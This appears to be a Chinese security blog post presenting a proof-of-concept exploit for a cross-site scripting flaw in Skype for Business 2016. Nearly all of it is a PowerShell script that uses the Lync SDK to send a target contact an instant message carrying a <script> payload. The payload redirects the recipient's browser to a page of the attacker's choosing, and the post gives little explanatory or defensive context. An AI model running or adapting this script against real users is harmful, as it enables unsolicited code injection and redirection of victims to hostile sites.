Skype for Business 2016 – 跨站点脚本漏洞

  • A+
所属分类:颓废's Blog
#target user $target = "[email protected]"    # For this example we will force the user to navigate to a page of our choosing (autopwn?) # Skype uses the default browser for this.    $message = "PoC Skype for Business 2016 XSS Injection<script>document.location.href=('')</script>"             if (-not (Get-Module -Name Microsoft.Lync.Model)) {     try         {         # you may need to change the location of this DLL             Import-Module "C:/Program Files/Microsoft Office/Office15/LyncSDK/Assemblies/Desktop/Microsoft.Lync.Model.dll" -ErrorAction Stop         }     catch         {             Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK"         } }     # Connect to the local Skype process     try     {         $client = [Microsoft.Lync.Model.LyncClient]::GetClient()     }     catch     {         Write-Host "`nMust be signed-in to Skype"         break     }         #Start Conversation     $msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]"        #Add the Message     $msg.Add(1,$message)        # Add the contact URI     try     {         $contact = $client.ContactManager.GetContactByUri($target)     }     catch     {         Write-Host "`nFailed to lookup Contact"$target         break     }           # Create a conversation     $convo = $client.ConversationManager.AddConversation()     $convo.AddParticipant($contact) | Out-Null        # Set the message mode as IM     $imModality = $convo.Modalities[1]     # Send the message     $imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null     # End the Convo to suppress the UI     $convo.End() | Out-Null        Write-Host "Sent the following message to "$target":`n"$message


:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: